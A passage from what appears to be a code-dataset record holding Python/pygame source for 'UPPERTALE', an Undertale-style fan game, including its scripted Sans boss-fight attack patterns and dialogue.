sans.say('好了,我也累了,不如我们休息一下?')\n\n\n@add_attack\ndef mercy2():\n sans.say('这也是一个改过自新的机会,')\n\n\n@add_attack\ndef mercy3():\n sans.say('赶紧按下饶恕,')\n\n\n<mask token>\n\n\n@add_attack\ndef mercy5():\n set_turn_time(0)\n sans.headtype = SANS_NORMAL\n\n\n<mask token>\n\n\n@add_attack\ndef before_flash():\n sans.say('好吧,看来你已经做出了自己的选择。')\n\n\n<mask token>\n\n\ndef flash_round_2():\n set_turn_time(100)\n global _boxsize, _boxpos, BOX_POS, BOX_SIZE\n BOX_SIZE = _boxsize = [150, 150]\n BOX_POS = _boxpos = [230, 230]\n player.type = RED_SOUL\n player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2, BOX_POS[1] + BOX_SIZE[1] / 2]\n\n def zjj(screen):\n angle = random.randint(-140, -40)\n d = random.randint(10, 200)\n blasters.append(GasterBlaster(pos=[player.pos[0] + math.cos(math.\n radians(angle)) * d, player.pos[1] + math.sin(math.radians(\n angle)) * d], angle=angle - 180, time1=0, time2=20, width=50))\n for _ in range(0, 50):\n tasks.append(Task(zjj, _ / 2))\n\n\ndef flash_round_3():\n set_turn_time(100)\n global _boxsize, _boxpos, BOX_POS, BOX_SIZE\n BOX_SIZE = _boxsize = [150, 150]\n BOX_POS = _boxpos = [200, 230]\n player.type = RED_SOUL\n player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2, BOX_POS[1] + BOX_SIZE[1] / 2]\n blasters.append(GasterBlaster(pos=[BOX_POS[0] + BOX_SIZE[0] / 2, 50],\n angle=90, time1=10, time2=70, time3=0, width=60))\n blasters.append(GasterBlaster(pos=[50, BOX_POS[1] + BOX_SIZE[1] / 2],\n angle=0, time1=10, time2=70, time3=0, width=60))\n\n\ndef flash_round_4():\n set_turn_time(100)\n global _boxsize, _boxpos, BOX_POS, BOX_SIZE\n BOX_SIZE = _boxsize = [150, 150]\n BOX_POS = _boxpos = [230, 230]\n player.type = RED_SOUL\n player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2, BOX_POS[1] + BOX_SIZE[1] / 2]\n blasters.append(GasterBlaster(pos=[BOX_POS[0] - 10, BOX_POS[1] - 10],\n angle=45, time1=10, time2=70, time3=0, width=60))\n blasters.append(GasterBlaster(pos=[BOX_POS[0] - 10, BOX_POS[1] +\n BOX_SIZE[1] + 10], angle=-45, time1=10, time2=70, time3=0, width=60))\n\n\ndef flash_round_5():\n set_turn_time(100)\n global _boxsize, _boxpos, BOX_POS, BOX_SIZE\n BOX_SIZE = _boxsize = [150, 150]\n BOX_POS = _boxpos = [230, 230]\n player.type = RED_SOUL\n player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2, BOX_POS[1] + BOX_SIZE[1] / 2]\n blasters.append(GasterBlaster(pos=[BOX_POS[0], 50], angle=90, time1=10,\n time2=70, time3=0, width=60))\n blasters.append(GasterBlaster(pos=[BOX_POS[0] + BOX_SIZE[0], 50], angle\n =90, time1=10, time2=70, time3=0, width=60))\n blasters.append(GasterBlaster(pos=[50, BOX_POS[1] + 50], angle=0, time1\n =10, time2=70, time3=0, width=100))\n\n\ndef flash_round_6():\n set_turn_time(100)\n global _boxsize, _boxpos, BOX_POS, BOX_SIZE\n BOX_SIZE = _boxsize = [150, 150]\n BOX_POS = _boxpos = [230, 230]\n player.type = RED_SOUL\n player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2, BOX_POS[1] + BOX_SIZE[1] / 2]\n blasters.append(GasterBlaster(pos=[BOX_POS[0], 50], angle=90, time1=10,\n time2=70, time3=0, width=60))\n blasters.append(GasterBlaster(pos=[BOX_POS[0] + BOX_SIZE[0], 50], angle\n =90, time1=10, time2=70, time3=0, width=60))\n blasters.append(GasterBlaster(pos=[50, BOX_POS[1] + BOX_SIZE[1] - 50],\n angle=0, time1=10, time2=70, time3=0, width=100))\n\n\n<mask token>\n",
"step-5": "import pygame\nimport time as time_\nimport random\nimport os\nfrom pygame.locals import *\nfrom math import sin, cos, pi\nfrom sys import exit\n# ---------------------------\nfrom unzip import *\nunzip()\n# ---------------------------\nfrom others import *\nfrom gaster_blaster import *\nfrom board import *\nfrom bone import *\nfrom sans import *\nfrom player import *\nfrom functions import *\n# ----------------------------------------------------------------\n'''初始化'''\nos.environ[\"SDL_VIDEO_WINDOW_POS\"] = \"100,100\"\npygame.init()\nif FULL_SCREEN:\n display = pygame.display.set_mode((1920, 1080), FULLSCREEN)\nelse:\n display = pygame.display.set_mode(SCREEN_SIZE)\nscreen = pygame.Surface(SCREEN_SIZE).convert_alpha()\nmask_surface_blue = pygame.Surface(SCREEN_SIZE).convert_alpha() # 蓝色攻击的mask\nmask_surface_orange = pygame.Surface(SCREEN_SIZE).convert_alpha() # 橙色攻击的mask\nmask_surface_normal = pygame.Surface(SCREEN_SIZE).convert_alpha() # 普通攻击的mask\npygame.display.set_caption(\"UPPERTALE\") #标题\npygame.display.set_icon(pygame.image.load(\"res/icon-32.png\")) #图标\n\nfps = pygame.time.Clock() # 帧数计时器\nframes = 60\n\n# -----------------------------------\n'''因为需要修改全局变量\n所以不得不写在主文件里的函数'''\ndef players_turn(text):\n def tmp():\n global is_players_turn, battle_text, shown_index\n is_players_turn = True\n battle_text = text\n shown_index = 0\n bones.clear()\n blasters.clear()\n boards.clear()\n attacks.append(tmp)\n\ndef set_turn_time(time):\n def next_turn(screen):\n global stop\n stop = False\n tasks.append(Task(next_turn, time))\n\ndef add_attack(func):\n attacks.append(func)\n return func\n\ndef shake(screen):\n global screen_shaking\n screen_shaking = True\n\ndef unshake(screen):\n global screen_shaking\n screen_shaking = False\n\ndef set_screen_angle(angle):\n global screen_angle\n screen_angle = angle\n\ndef start_testing():\n attacks.clear()\n\n# -------------------------------------\n'''回合'''\n# 吟唱\n@add_attack\ndef yinchang_1():\n global BOX_POS, BOX_SIZE\n BOX_POS = [230, 230]\n BOX_SIZE = [170, 160]\n if DEBUG:\n # 测试区开始\n pass\n # 测试区结束\n sans.say(\"准备好了?\")\n\n# 开头杀\n@add_attack\ndef first_round1():\n set_turn_time(50)\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n player.falling = True\n tasks.append(Task(shake,\n (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake,\n ((BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10) + 5))\n tasks.append(Task(lambda screen : slam_sound.play(),\n (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n for x in range(BOX_POS[0], BOX_POS[0] + BOX_SIZE[0], 10):\n bones.append(\n Bone(\n pos=[x, BOX_POS[1] + BOX_SIZE[1] - 7],\n speed=[0, -5],\n direction=UP,\n time1=8,\n time2=40,\n length=1000,\n type_=1\n )\n )\n\n bones.append(\n Bone(\n pos=[x, BOX_POS[1] + BOX_SIZE[1] - 47],\n speed=[0, 0],\n direction=UP,\n time1=200,\n time2=48,\n length=1000,\n type_=1\n )\n )\n\n bones.append(\n Bone(\n pos=[x, BOX_POS[1] + BOX_SIZE[1] - 47],\n speed=[0, 5],\n direction=UP,\n time1=8,\n time2=248,\n length=1000,\n type_=1\n )\n )\n@add_attack\ndef first_round2():\n set_turn_time(50)\n sans.hand_direction = LEFT\n player.type = BLUE_SOUL\n player.direction = LEFT\n player.falling_speed = 10\n player.falling = True\n tasks.append(Task(shake,\n (player.pos[0] - BOX_POS[0]) // 10))\n tasks.append(Task(unshake,\n ((player.pos[0] - BOX_POS[0]) // 10) + 5))\n tasks.append(Task(lambda screen : slam_sound.play(),\n (player.pos[0] - BOX_POS[0]) // 10))\n for y in range(BOX_POS[1], BOX_POS[1] + BOX_SIZE[1], 10):\n bones.append(\n Bone(\n pos=[BOX_POS[0] - 7, y],\n speed=[0, 0, 5],\n direction=LEFT,\n time1=8,\n time2=30,\n length=0,\n type_=2\n )\n )\n bones.append(\n Bone(\n pos=[BOX_POS[0] - 7, y],\n speed=[0, 0, 0],\n direction=LEFT,\n time1=150,\n time2=38,\n length=40,\n type_=2\n )\n )\n bones.append(\n Bone(\n pos=[BOX_POS[0] - 7, y],\n speed=[0, 0, -5],\n direction=LEFT,\n time1=8,\n time2=188,\n length=40,\n type_=2\n )\n )\n\n@add_attack\ndef first_round3():\n set_turn_time(450)\n player.type = RED_SOUL\n for _ in range(0, 300, 2):\n bones.append(\n Bone(\n pos=BOX_POS,\n length=40 + sin(_ / 20) * 40,\n direction=UP,\n speed=[7, 0],\n time1=1000,\n time2=_,\n )\n )\n bones.append(\n Bone(\n pos=[BOX_POS[0], BOX_POS[1] + 25 + (sin(_ / 20) * 40) + 60],\n length=1000,\n direction=UP,\n speed=[7, 0],\n time1=1000,\n time2=_,\n )\n )\n\n@add_attack\ndef first_round4():\n sans.headtype = SANS_LOOK_LEFT\n sans.say(\"只是第一个回合而已,何必用尽全力?\")\n\n@add_attack\ndef first_round5():\n set_turn_time(1)\n sans.headtype = SANS_NORMAL\n pygame.mixer.music.play(-1)\n\nplayers_turn(\"* ...\")\n\n@add_attack\ndef zjj_1():\n set_turn_time(60)\n global BOX_POS, BOX_SIZE\n BOX_POS = [200, 230]\n BOX_SIZE = [200, 150]\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n tasks.append(Task(shake,\n (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake,\n ((BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10) + 5))\n tasks.append(Task(lambda screen : slam_sound.play(),\n (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n\n@add_attack\ndef zjj_2():\n set_turn_time(11 * 100)\n def zjj(screen):\n angle = random.randint(240, 300)\n blasters.append(GasterBlaster(\n pos=[\n player.pos[0] + math.cos(math.radians(angle)) * 200,\n player.pos[1] + math.sin(math.radians(angle)) * 200],\n angle=angle - 180,\n time1=10,\n time2=30,\n width=30,\n color=BLUE\n ))\n for _ in range(10):\n tasks.append(Task(zjj, _ * 100))\n bones.append(\n Bone(\n pos=[BOX_POS[0] - 20, BOX_POS[1] - 8],\n length=BOX_SIZE[1] - 30 - 16,\n direction=DOWN,\n time1=1000,\n time2=_ * 100 + 60,\n speed=[2, 0],\n type_=2\n ))\n \n bones.append(\n Bone(\n pos=[BOX_POS[0] + BOX_SIZE[0] + 20, BOX_POS[1] - 8],\n length=BOX_SIZE[1] - 30 - 16,\n direction=DOWN,\n time1=1000,\n time2=_ * 100 + 60,\n speed=[-2, 0],\n type_=2\n ))\n\n \n bones.append(\n Bone(\n pos=[BOX_POS[0] - 20, BOX_POS[1] + BOX_SIZE[1] - 10 - 8],\n length=1000,\n direction=DOWN,\n time1=1000,\n time2=_ * 100 + 60,\n speed=[2, 0],\n type_=1\n ))\n \n bones.append(\n Bone(\n pos=[BOX_POS[0] + BOX_SIZE[0] + 20, BOX_POS[1] + BOX_SIZE[1] - 10 - 8],\n length=1000,\n direction=DOWN,\n time1=1000,\n time2=_ * 100 + 60,\n speed=[-2, 0],\n type_=1\n ))\n\nplayers_turn(\"* ...\")\n\n@add_attack\ndef blue_bone():\n set_turn_time(700)\n global BOX_POS, BOX_SIZE\n BOX_POS = [150, 250]\n BOX_SIZE = [350, 120]\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n tasks.append(Task(shake,\n (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake,\n ((BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10) + 5))\n tasks.append(Task(lambda screen : slam_sound.play(),\n (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n for _ in range(10):\n bones.append(\n Bone(\n pos=[BOX_POS[0], BOX_POS[1] - 8],\n length=BOX_SIZE[1] - 30 - 16,\n direction=DOWN,\n time1=1000,\n time2=_ * 60 + 60,\n speed=[4, 0],\n type_=2\n ))\n \n bones.append(\n Bone(\n pos=[BOX_POS[0], BOX_POS[1] + BOX_SIZE[1] - 10 - 8],\n length=1000,\n direction=DOWN,\n time1=1000,\n time2=_ * 60 + 60,\n speed=[4, 0],\n type_=1\n ))\n \n bones.append(\n Bone(\n pos=BOX_POS,\n length=1000,\n direction=DOWN,\n time1=1000,\n time2=_ * 60 + 60 + 16,\n speed=[4, 0],\n type_=1,\n color=BLUE\n ))\n \n@add_attack\ndef orange_bone():\n def start_spinning(screen):\n global spinning_left\n spinning_left = True\n def stop_spinning(screen):\n global spinning_left\n spinning_left = False\n tasks.append(Task(start_spinning, 0))\n tasks.append(Task(stop_spinning, 180))\n tasks.append(Task(lambda screen:set_screen_angle(180), 181))\n tasks.append(Task(start_spinning, 520))\n tasks.append(Task(stop_spinning, 700))\n tasks.append(Task(lambda screen:set_screen_angle(0), 701))\n set_turn_time(700)\n sans.hand_direction = UP\n player.type = BLUE_SOUL\n player.direction = UP\n player.falling_speed = 10\n tasks.append(Task(shake,\n (player.pos[1] - BOX_POS[1]) // 10))\n tasks.append(Task(unshake,\n ((player.pos[1] - BOX_POS[1]) // 10) + 5))\n tasks.append(Task(lambda screen : slam_sound.play(),\n (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n for _ in range(10):\n bones.append(\n Bone(\n pos=[BOX_POS[0], BOX_POS[1] - 8],\n length=10,\n direction=DOWN,\n time1=1000,\n time2=_ * 60 + 60,\n speed=[8, 0],\n type_=2\n ))\n \n bones.append(\n Bone(\n pos=[BOX_POS[0], BOX_POS[1] + 30 + 16],\n length=1000,\n direction=DOWN,\n time1=1000,\n time2=_ * 60 + 60,\n speed=[8, 0],\n type_=1\n ))\n \n bones.append(\n Bone(\n pos=BOX_POS,\n length=1000,\n direction=DOWN,\n time1=1000,\n time2=_ * 60 + 60 + 8,\n speed=[8, 0],\n type_=1,\n color=ORANGE\n ))\n\nplayers_turn(\"* ...\")\n\n@add_attack\ndef bone_gap():\n set_turn_time(1000)\n global BOX_POS, BOX_SIZE\n BOX_POS = [150, 230]\n BOX_SIZE = [300, 150]\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n tasks.append(Task(shake,\n (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake,\n ((BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10) + 5))\n tasks.append(Task(lambda screen : slam_sound.play(),\n (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n for _ in range(10):\n x = BOX_POS[0] + random.randint(100, BOX_SIZE[0] - 100)\n bones.append(Bone(\n pos=[x, BOX_POS[1]],\n time1=10,\n time2=_ * 100,\n speed=[0, 0, BOX_SIZE[1] / 10],\n length=0,\n direction=DOWN,\n color=BLUE\n ))\n bones.append(Bone(\n pos=[x, BOX_POS[1]],\n time1=10,\n time2=_ * 100 + 10,\n speed=[0, 0, -BOX_SIZE[1] / 10],\n length=BOX_SIZE[1],\n direction=DOWN,\n color=BLUE\n ))\n tasks.append(Task(shake,_ * 100 + 10))\n tasks.append(Task(unshake,_ * 100 + 15))\n tasks.append(Task(lambda screen : slam_sound.play(),\n _ * 100 + 15))\n \n y = BOX_POS[1] + random.randint(70, BOX_SIZE[1] - 30)\n bones.append(Bone(\n pos=[BOX_POS[0], y],\n time1=10,\n time2=_ * 100,\n speed=[0, 0, BOX_SIZE[0] / 10],\n length=0,\n direction=RIGHT,\n color=ORANGE\n ))\n bones.append(Bone(\n pos=[BOX_POS[0], y],\n time1=10,\n time2=_ * 100 + 10,\n speed=[0, 0, -BOX_SIZE[0] / 10],\n length=BOX_SIZE[0],\n direction=RIGHT,\n color=ORANGE\n ))\n\n \n bones.append(\n Bone(\n pos=[BOX_POS[0], BOX_POS[1] - 8],\n length=y - BOX_POS[1] - 16,\n direction=DOWN,\n time1=1000,\n time2=_ * 100 + 60,\n speed=[(x - BOX_POS[0]) / 30, 0],\n type_=2\n ))\n \n bones.append(\n Bone(\n pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1] - 8],\n length=y - BOX_POS[1] - 16,\n direction=DOWN,\n time1=1000,\n time2=_ * 100 + 60,\n speed=[-((BOX_SIZE[0] + BOX_POS[0] - x) / 30), 0],\n type_=2\n ))\n\n \n bones.append(\n Bone(\n pos=[BOX_POS[0], y + 8],\n length=1000,\n direction=DOWN,\n time1=1000,\n time2=_ * 100 + 60,\n speed=[(x - BOX_POS[0]) / 30, 0],\n type_=1\n ))\n \n bones.append(\n Bone(\n pos=[BOX_POS[0] + BOX_SIZE[0], y + 8],\n length=1000,\n direction=DOWN,\n time1=1000,\n time2=_ * 100 + 60,\n speed=[-((BOX_SIZE[0] + BOX_POS[0] - x) / 30), 0],\n type_=1\n ))\n\nplayers_turn(\"* ...\")\n\n@add_attack\ndef board_1():\n set_turn_time(10)\n global BOX_POS, BOX_SIZE\n BOX_POS = [50, 240]\n BOX_SIZE = [500, 140]\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n tasks.append(Task(shake,\n (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake,\n ((BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10) + 5))\n tasks.append(Task(lambda screen : slam_sound.play(),\n (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n \n@add_attack\ndef board_2():\n set_turn_time(600)\n tasks.append(Task(shake, 70))\n tasks.append(Task(unshake, 75))\n blasters.append(\n GasterBlaster(\n pos=[10, BOX_POS[1] + BOX_SIZE[1]],\n angle=0,\n time1=10,\n time2=70,\n time3=10,\n width=70\n )\n )\n\n blasters.append(\n GasterBlaster(\n pos=[10, BOX_POS[1]],\n angle=0,\n time1=10,\n time2=70,\n time3=10,\n width=30\n )\n )\n\n for x in range(BOX_POS[0], BOX_POS[0] + BOX_SIZE[0], 12):\n bones.append(\n Bone(\n pos=[x, BOX_POS[1] + BOX_SIZE[1] - 30],\n length=1000,\n direction=UP,\n time1=1000,\n time2=100,\n speed=[0, 0],\n type_=1\n )\n )\n bones.append(\n Bone(\n pos=[x, BOX_POS[1] - 8],\n length=5,\n direction=DOWN,\n time1=1000,\n time2=100,\n speed=[0, 0],\n type_=2\n )\n )\n boards.append(\n Board(\n pos=[BOX_POS[0],BOX_POS[1] + BOX_SIZE[1] - 40],\n length=40,\n speed=[1, 0],\n time1=BOX_SIZE[0],\n time2=100,\n direction=UP\n )\n )\n\n for _ in range(0, 20, 4):\n bones.append(\n Bone(\n pos=[BOX_POS[0] + BOX_SIZE[0],\n BOX_POS[1] + BOX_SIZE[1] - 40 - 25],\n length=1000,\n direction=UP,\n time1=BOX_SIZE[0] // 4,\n time2=150 + (_ * 30),\n speed=[-4, 0]\n )\n )\n def start_spinning(screen):\n global spinning_left\n spinning_left = True\n def stop_spinning(screen):\n global spinning_left\n spinning_left = False\n tasks.append(Task(start_spinning, 200))\n tasks.append(Task(stop_spinning, 380))\n tasks.append(Task(start_spinning, 500))\n tasks.append(Task(stop_spinning, 680))\n tasks.append(Task(lambda screen:set_screen_angle(0), 682))\n\n@add_attack\ndef board_3():\n set_turn_time(100)\n sans.hand_direction = LEFT\n player.type = BLUE_SOUL\n player.direction = LEFT\n player.falling_speed = 10\n tasks.append(Task(shake,\n (player.pos[0] - BOX_POS[0]) // 10))\n tasks.append(Task(unshake,\n ((player.pos[0] - BOX_POS[0]) // 10) + 5))\n tasks.append(Task(lambda screen : slam_sound.play(),\n (player.pos[0] - BOX_POS[0]) // 10))\n \n tasks.append(Task(shake, 60))\n tasks.append(Task(unshake, 65))\n blasters.append(\n GasterBlaster(\n pos=[BOX_POS[0], 10],\n angle=90,\n time1=10,\n time2=50,\n time3=0,\n width=50\n )\n )\n\n@add_attack\ndef board_4():\n set_turn_time(0)\n bones.clear()\n\nplayers_turn(\"* ...\")\n\n@add_attack\ndef board_2_1():\n set_turn_time(10)\n global BOX_POS, BOX_SIZE\n BOX_POS = [50, 240]\n BOX_SIZE = [500, 140]\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n tasks.append(Task(shake,\n (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake,\n ((BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10) + 5))\n tasks.append(Task(lambda screen : slam_sound.play(),\n (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n\n@add_attack\ndef board_2_2():\n set_turn_time(600)\n tasks.append(Task(shake, 70))\n tasks.append(Task(unshake, 75))\n blasters.append(\n GasterBlaster(\n pos=[10, BOX_POS[1] + BOX_SIZE[1]],\n angle=0,\n time1=10,\n time2=70,\n time3=10,\n width=70\n )\n )\n \n tasks.append(Task(shake, 250))\n tasks.append(Task(unshake, 255))\n blasters.append(\n GasterBlaster(\n pos=[10, BOX_POS[1] + BOX_SIZE[1] - 20],\n angle=0,\n time1=10,\n time2=70,\n time3=250,\n width=70\n )\n )\n\n boards.append(\n Board(\n pos=[BOX_POS[0] + BOX_SIZE[0],\n BOX_POS[1] + BOX_SIZE[1] - 30 - 10],\n time1=1000,\n time2=0,\n speed=[-2, 0],\n length=40\n )\n )\n\n boards.append(\n Board(\n pos=[BOX_POS[0] + BOX_SIZE[0],\n BOX_POS[1] + BOX_SIZE[1] - 30 - 10],\n time1=1000,\n time2=100,\n speed=[-1.5, 0],\n length=40\n )\n )\n\n boards.append(\n Board(\n pos=[BOX_POS[0] + BOX_SIZE[0],\n BOX_POS[1] + BOX_SIZE[1] - 30 - 10],\n time1=1000,\n time2=200,\n speed=[-1, 0],\n length=40\n )\n )\n\n boards.append(\n Board(\n pos=[BOX_POS[0] + BOX_SIZE[0],\n BOX_POS[1] + BOX_SIZE[1] - 30 - 30],\n time1=1000,\n time2=300,\n speed=[-3, 0],\n length=80\n )\n )\n \n for x in range(BOX_POS[0], BOX_POS[0] + BOX_SIZE[0], 12):\n bones.append(\n Bone(\n pos=[x, BOX_POS[1] + BOX_SIZE[1] - 30],\n length=1000,\n direction=UP,\n time1=400,\n time2=100,\n speed=[0, 0],\n type_=1\n )\n )\n\n bones.append(\n Bone(\n pos=[x, BOX_POS[1] + BOX_SIZE[1] - 30],\n length=1000,\n direction=UP,\n time1=1000,\n time2=500,\n speed=[0, 0],\n type_=1\n )\n )\n\nplayers_turn(\"* ...\")\n\n@add_attack\ndef bone_lid1():\n set_turn_time(70)\n global BOX_SIZE, BOX_POS\n BOX_POS = [200, 240]\n BOX_SIZE = [200, 150]\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n tasks.append(Task(shake,\n (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake,\n ((BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10) + 5))\n tasks.append(Task(lambda screen : slam_sound.play(),\n (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n bones.append(\n RotatableBone(\n pos=[BOX_POS[0] - 70, BOX_POS[1] + BOX_SIZE[1]],\n time1=1000,\n length=130,\n angle=45,\n speed=[5, 0, 0, 0]\n )\n )\n bones.append(\n RotatableBone(\n pos=[BOX_POS[0] + BOX_SIZE[0] + 70, BOX_POS[1] + BOX_SIZE[1]],\n time1=1000,\n length=130,\n angle=-45,\n speed=[-5, 0, 0, 0]\n )\n )\n\n@add_attack\ndef bone_lid2():\n set_turn_time(60)\n sans.hand_direction = UP\n player.type = BLUE_SOUL\n player.direction = UP\n player.falling_speed = 10\n player.falling = True\n tasks.append(Task(shake,\n (player.pos[1] - BOX_POS[1]) // 10))\n tasks.append(Task(unshake,\n ((player.pos[1] - BOX_POS[1]) // 10) + 5))\n tasks.append(Task(lambda screen : slam_sound.play(),\n (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n bones.append(\n RotatableBone(\n pos=[BOX_POS[0] - 20, BOX_POS[1]],\n time1=1000,\n length=130,\n angle=-45,\n speed=[5, 0, 0, 0]\n )\n )\n bones.append(\n RotatableBone(\n pos=[BOX_POS[0] + BOX_SIZE[0] + 20, BOX_POS[1]],\n time1=1000,\n length=130,\n angle=45,\n speed=[-5, 0, 0, 0]\n )\n )\n\n@add_attack\ndef bone_lid3():\n set_turn_time(1300)\n player.type = RED_SOUL\n for _ in range(20):\n bones.append(\n RotatableBone(\n pos=[BOX_POS[0], BOX_POS[1] - 20],\n time1=1000,\n time2=_ * 60,\n length=260,\n angle=-45,\n speed=[0, 2, 0, 0]\n )\n )\n bones.append(\n RotatableBone(\n pos=[BOX_POS[0], BOX_POS[1] + BOX_SIZE[1] + 20],\n time1=1000,\n time2=_ * 60,\n length=260,\n angle=45,\n speed=[0, -2, 0, 0]\n )\n )\n \n bones.append(\n RotatableBone(\n pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1] - 20],\n time1=1000,\n time2=_ * 60 + 30,\n length=260,\n angle=45,\n speed=[0, 2, 0, 0]\n )\n )\n bones.append(\n RotatableBone(\n pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1] + BOX_SIZE[1] + 20],\n time1=1000,\n time2=_ * 60 + 30,\n length=260,\n angle=-45,\n speed=[0, -2, 0, 0]\n )\n )\n\nplayers_turn(\"* ...\")\n\n@add_attack\ndef mercy1():\n pygame.mixer.music.pause()\n sans.say(\"好了,我也累了,不如我们休息一下?\")\n\n@add_attack\ndef mercy2():\n sans.say(\"这也是一个改过自新的机会,\")\n\n@add_attack\ndef mercy3():\n sans.say(\"赶紧按下饶恕,\")\n\n@add_attack\ndef mercy4():\n sans.headtype = SANS_NO_EYES\n sans.say(\"否则你绝对不想见到下一个回合\")\n\n@add_attack\ndef mercy5():\n set_turn_time(0)\n sans.headtype = SANS_NORMAL\n \nplayers_turn(\"* ...\")\n@add_attack\ndef before_flash():\n sans.say(\"好吧,看来你已经做出了自己的选择。\")\n \n@add_attack\ndef flash_round():\n set_turn_time(10)\n global blackout\n flash_sound.play()\n blackout = True\n bones.clear()\n blasters.clear()\n boards.clear()\n def flash(screen):\n global blackout\n blackout = False\n flash_sound.play()\n pygame.mixer.music.unpause()\n tasks.append(Task(flash, 10))\n \ndef flash_round_1():\n set_turn_time(150)\n global _boxsize, _boxpos, BOX_POS, BOX_SIZE\n player.type = BLUE_SOUL\n player.direction = DOWN\n BOX_SIZE = _boxsize = [150, 150]\n BOX_POS = _boxpos = [230, 230]\n player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2,\n 100000]\n direction = random.randint(0, 1)\n blasters.append(\n GasterBlaster(\n pos=[BOX_POS[0] - 30, BOX_POS[1] + BOX_SIZE[1] - 30],\n angle=0,\n time1=0,\n time2=30,\n time3=10,\n width=90\n )\n )\n blasters.append(\n GasterBlaster(\n pos=[BOX_POS[0] - 30, BOX_POS[1] - 30],\n angle=0,\n time1=0,\n time2=30,\n time3=60,\n width=90\n )\n )\n if direction:\n blasters.append(\n GasterBlaster(\n pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1] - 30],\n angle=90,\n time1=0,\n time2=30,\n time3=10,\n width=90\n )\n )\n blasters.append(\n GasterBlaster(\n pos=[BOX_POS[0], BOX_POS[1] - 30],\n angle=90,\n time1=0,\n time2=30,\n time3=60,\n width=90\n )\n )\n else:\n blasters.append(\n GasterBlaster(\n pos=[BOX_POS[0], BOX_POS[1] - 30],\n angle=90,\n time1=0,\n time2=30,\n time3=10,\n width=90\n )\n )\n blasters.append(\n GasterBlaster(\n pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1] - 30],\n angle=90,\n time1=0,\n time2=30,\n time3=60,\n width=90\n )\n )\n for angle in range(0, 360, 10):\n bones.append(RotatableBone(\n pos=[BOX_POS[0] + BOX_SIZE[0] / 2 + cos(radians(angle)) * BOX_SIZE[0] / 2,\n BOX_POS[1] + BOX_SIZE[1] / 2 + 25 + sin(radians(angle)) * BOX_SIZE[1] / 2],\n length=25,\n angle=angle,\n time1=150\n )\n )\n if angle % 30 == 0:\n bones.append(RotatableBone(\n pos=[BOX_POS[0] + BOX_SIZE[0] / 2,\n BOX_POS[1] + BOX_SIZE[1] / 2 + 25],\n length=40,\n angle=angle,\n speed=[0, 0, 0, 5],\n time1=130,\n time2=20\n )\n )\n\ndef flash_round_2():\n set_turn_time(100)\n global _boxsize, _boxpos, BOX_POS, BOX_SIZE\n BOX_SIZE = _boxsize = [150, 150]\n BOX_POS = _boxpos = [230, 230]\n player.type = RED_SOUL\n player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2,\n BOX_POS[1] + BOX_SIZE[1] / 2]\n def zjj(screen):\n angle = random.randint(-140, -40)\n d = random.randint(10, 200)\n blasters.append(GasterBlaster(\n pos=[\n player.pos[0] + math.cos(math.radians(angle)) * d,\n player.pos[1] + math.sin(math.radians(angle)) * d],\n angle=angle - 180,\n time1=0,\n time2=20,\n width=50\n ))\n for _ in range(0, 50):\n tasks.append(Task(zjj, _ / 2))\n\ndef flash_round_3():\n set_turn_time(100)\n global _boxsize, _boxpos, BOX_POS, BOX_SIZE\n BOX_SIZE = _boxsize = [150, 150]\n BOX_POS = _boxpos = [200, 230]\n player.type = RED_SOUL\n player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2,\n BOX_POS[1] + BOX_SIZE[1] / 2]\n blasters.append(\n GasterBlaster(\n pos=[BOX_POS[0] + BOX_SIZE[0] / 2, 50],\n angle=90,\n time1=10,\n time2=70,\n time3=0,\n width=60\n )\n )\n blasters.append(\n GasterBlaster(\n 